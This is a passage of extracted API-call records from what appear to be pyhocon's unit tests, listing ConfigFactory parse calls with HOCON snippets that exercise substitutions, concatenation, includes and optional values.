ConfigSubstitutionException, ConfigTree\n'), ((10266, 10433), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """'], {}), '(\n """\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """\n )\n', (10292, 10433), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10650, 10769), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = a b c\n b = 5 b\n c = b 7\n """'], {}), '(\n """\n a = a b c\n b = 5 b\n c = b 7\n """\n )\n', (10676, 10769), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10955, 11091), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """\n )\n', (10981, 11091), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11256, 11294), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = 45\n"""'], {}), "('a = 45\\n')\n", (11282, 11294), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11682, 11983), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """\n )\n', (11708, 11983), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12149, 12462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """\n )\n', (12175, 12462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12640, 12962), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """'], {}), '(\n u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """\n )\n', (12666, 12962), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13202, 13431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """'], {}), '(\n """\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """\n )\n', (13228, 13431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13607, 13837), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """\n )\n', (13633, 13837), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13948, 14183), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n 
c = 5\n }\n }\n d = test ${a.b.c}\n }\n """\n )\n', (13974, 14183), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14301, 14539), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """\n )\n', (14327, 14539), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14708, 14971), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """\n )\n', (14734, 14971), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15132, 15266), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """'], {}), '(\n """\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """\n )\n', (15158, 15266), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15440, 15630), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """\n )\n', (15466, 15630), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15788, 15978), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """\n )\n', (15814, 15978), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16138, 16366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """\n )\n', (16164, 16366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16590, 16854), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """\n )\n', (16616, 16854), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17153, 17380), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 
6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """\n )\n', (17179, 17380), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17529, 17756), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """\n )\n', (17555, 17756), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17960, 17999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = bar"""'], {}), "('foo = bar')\n", (17986, 17999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18111, 18150), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = "5\\""""'], {}), '(\'foo = "5"\')\n', (18137, 18150), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18267, 18310), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = ""\\"5""\\""""'], {}), '(\'foo = """5"""\')\n', (18293, 18310), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18410, 18447), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5"""'], {}), "('foo = 5')\n", (18436, 18447), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18547, 18586), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5.0"""'], {}), "('foo = 5.0')\n", (18573, 18586), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18680, 18840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """\n )\n', (18706, 18840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18944, 19104), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """\n )\n', (18970, 19104), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19209, 19376), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """\n )\n', (19235, 19376), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19555, 19777), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """\n 
)\n', (19581, 19777), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20092, 20238), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n main_language = php\n languages = [java, ${main_language}]\n """'], {}), '(\n """\n main_language = php\n languages = [java, ${main_language}]\n """\n )\n', (20118, 20238), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20378, 20654), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """'], {}), '(\n """\n application.foo = 128mm\n application.large-jvm-opts = ["-XX:+UseParNewGC"] [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ["-XX:+UseParNewGC"]\n """\n )\n', (20404, 20654), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21025, 21387), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """'], {}), '(\n """\n application.foo = 128mm\n application.default-jvm-opts = ["-XX:+UseParNewGC"]\n application.large-jvm-opts = ${application.default-jvm-opts} [-Xm16g, ${application.foo}]\n application.large-jvm-opts2 = [-Xm16g, ${application.foo}] ${application.default-jvm-opts}\n """\n )\n', (21051, 21387), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24172, 24344), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """'], {}), '(\n """\n x = [1,2]\n x = ${x} [3,4]\n x = [-1, 0] ${x} [5, 6]\n x = [-3, -2] ${x}\n """\n )\n', (24198, 24344), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24481, 24578), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x += [3,4]\n """'], {}), '(\n """\n x = [1,2]\n x += [3,4]\n """)\n', (24507, 24578), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((24794, 24887), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = abc\n x += def\n """'], {}), '(\n """\n x = abc\n x += def\n """)\n', (24820, 24887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25089, 25157), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += def\n """'], {}), '("""\n x += def\n """)\n', (25115, 25157), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25289, 25359), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += [1,2]\n """'], {}), '("""\n x += [1,2]\n """)\n', (25315, 25359), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25480, 25579), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1}\n x += {b: 2}\n """'], {}), '(\n """\n x = {a: 
1}\n x += {b: 2}\n """)\n', (25506, 25579), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25717, 25788), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x += {a: 1}\n """'], {}), '("""\n x += {a: 1}\n """)\n', (25743, 25788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((25928, 26087), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """'], {}), '(\n """\n x = [1,2]\n x = {x: [3,4]}\n x = {y: [5,6]}\n x = {z: ${x}}\n """\n )\n', (25954, 26087), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26324, 26437), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """'], {}), '(\n """\n x = {x: [3,4]}\n x = [${x}, 2, 3]\n """\n )\n', (26350, 26437), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26650, 26753), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {z: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {z: 1}}\n x = ${x.y}\n """)\n', (26676, 26753), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((26991, 27094), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {y: {y: 1}}\n x = ${x.y}\n """'], {}), '(\n """\n x = {y: {y: 1}}\n x = ${x.y}\n """)\n', (27017, 27094), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27824, 27972), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """'], {}), '(\n """\n foo : { a : { c : 1 } }\n foo : ${foo.a}\n foo : { a : 2 }\n """\n )\n', (27850, 27972), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28220, 28366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n """\n )\n', (28246, 28366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((28630, 28811), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """'], {}), '(\n """\n bar : {\n foo : 42,\n baz : ${bar.foo}\n }\n bar : { foo : 43 }\n """\n )\n', (28656, 28811), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29082, 29347), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """'], {}), '(\n """\n // bar.a should end up as 4\n bar : { a : ${foo.d}, b : 1 }\n bar.b = 3\n // foo.c should end up as 3\n foo : { c : ${bar.b}, d : 2 }\n foo.d = 4\n """\n )\n', (29108, 29347), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((29657, 29729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = ${?a}foo\n """'], {}), '("""\n a = ${?a}foo\n """)\n', (29683, 29729), False, 'from pyhocon import 
ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30178, 30356), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """'], {}), '(\n """\n x = {a: 1, b: 2}\n x = ${x} {c: 3}\n x = {z: 0} ${x}\n x = {y: -1} ${x} {d: 4}\n """\n )\n', (30204, 30356), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30506, 30765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """'], {}), '(\n """\n a.b = 3\n a.b = ${a.b}\n a.b = ${a.b}\n a.c = [1,2]\n a.c = ${a.c}\n a.d = {foo: bar}\n a.d = ${a.d}\n\n """\n )\n', (30532, 30765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((30918, 31057), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = perl java python\n """'], {}), '(\n """\n common_modules = perl java python\n """\n )\n', (30944, 31057), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31257, 31402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl] [java] [python]\n """'], {}), '(\n """\n common_modules = [perl] [java] [python]\n """\n )\n', (31283, 31402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31551, 31702), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = {a:perl} {b:java} {c:python}\n """'], {}), '(\n """\n common_modules = {a:perl} {b:java} {c:python}\n """\n )\n', (31577, 31702), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((31866, 31914), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""file:samples/aws.conf"""'], {}), "('file:samples/aws.conf')\n", (31889, 31914), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32121, 32165), 'pyhocon.ConfigFactory.parse_URL', 'ConfigFactory.parse_URL', (['"""https://nosuchurl"""'], {}), "('https://nosuchurl')\n", (32144, 32165), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32258, 32306), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/animals.conf"""'], {}), "('samples/animals.conf')\n", (32282, 32306), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32499, 32551), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_animals.conf"""'], {}), "('samples/all_animals.conf')\n", (32523, 32551), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((32752, 32801), 'pyhocon.ConfigFactory.parse_file', 'ConfigFactory.parse_file', (['"""samples/all_bars.conf"""'], {}), "('samples/all_bars.conf')\n", (32776, 32801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33179, 33327), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """'], {}), '(\n """\n a: [\n {a: 1, b: 2},\n {a: 3, c: 4},\n ]\n """\n )\n', (33205, 33327), False, 'from pyhocon import ConfigFactory, 
ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33493, 33627), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n [1, 2]\n [3, 4]\n ]\n """'], {}), '(\n """\n a: [\n [1, 2]\n [3, 4]\n ]\n """\n )\n', (33519, 33627), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((33784, 34001), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """'], {}), '(\n """\n b = {f: 4}\n a: [\n ${b} {a: 1, b: 2},\n {a: 3, c: 4} ${b},\n {a: 3} ${b} {c: 6},\n ]\n """\n )\n', (33810, 34001), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((34232, 34434), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """'], {}), '(\n """\n b = [5, 6]\n a: [\n ${b} [1, 2]\n [3, 4] ${b}\n [1, 2] ${b} [7, 8]\n ]\n """\n )\n', (34258, 34434), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36386, 36546), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """'], {}), '(\n """\n a: [\n include "dummy.txt"\n 3\n 4\n ]\n """\n )\n', (36412, 36546), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((36657, 36829), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required("samples/animals.d/cat.conf")\n t = 2\n }\n """\n )\n', (36683, 36829), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37065, 37243), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """'], {}), '(\n """\n a {\n include required(file("samples/animals.d/cat.conf"))\n t = 2\n }\n """\n )\n', (37091, 37243), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37663, 37724), 'pyhocon.ConfigParser.resolve_package_path', 'ConfigParser.resolve_package_path', (['"""pyhocon:config_parser.py"""'], {}), "('pyhocon:config_parser.py')\n", (37696, 37724), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((37740, 37760), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (37754, 37760), False, 'import os\n'), ((38165, 38183), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (38181, 38183), False, 'import tempfile\n'), ((41436, 41522), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n include-database=true\n """'], {}), '(\n """\n include-database=true\n """)\n', (41462, 41522), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((41666, 42074), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = <PASSWORD>\n }\n\n user=test_user\n pass=<PASSWORD>\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """'], {}), '(\n """\n database {\n host = localhost\n port = 5432\n user = people\n name = peopledb\n pass = <PASSWORD>\n }\n\n user=test_user\n 
pass=<PASSWORD>\n\n database {\n user = ${user}\n pass = ${pass}\n }\n\n """\n )\n', (41692, 42074), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42253, 42489), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = <PASSWORD>\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = <PASSWORD>\n name = ${?NOT_EXISTS}\n pass = ${?NOT_EXISTS}\n }\n """\n )\n', (42279, 42489), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((42671, 42863), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """'], {}), '(\n """\n a: 1\n b: foo\n c: ${a} ${b}\n c: ${b} ${a}\n d: ${a} ${b}\n d: ${a} bar\n """\n )\n', (42697, 42863), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43011, 43274), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n database {\n name = peopledb\n pass = <PASSWORD>\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """'], {}), '(\n """\n database {\n name = peopledb\n pass = <PASSWORD>\n }\n\n database {\n name = ${?user}\n pass = ${?pass}\n }\n\n """\n )\n', (43037, 43274), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43449, 43564), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: 42\n foo: ${?a}\n """'], {'resolve': '(False)'}), '(\n """\n foo: 42\n foo: ${?a}\n """, resolve\n =False)\n', (43475, 43564), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43585, 43650), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b: 14\n """'], {}), '("""\n b: 14\n """)\n', (43611, 43650), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43895, 43928), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""c=5"""'], {}), "('c=5')\n", (43921, 43928), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((43947, 43998), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""b=${c}"""'], {'resolve': '(False)'}), "('b=${c}', resolve=False)\n", (43973, 43998), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44271, 44477), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """'], {}), '(\n """\n a = 45\n b = ${?c}\n d = ${?c} 4\n e = ${?a}\n g = ${?c1} ${?c2}\n h = ${?c1} ${?c2} 1\n """\n )\n', (44297, 44477), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((44713, 44887), 'pyhocon.ConfigFactory.parse_string', 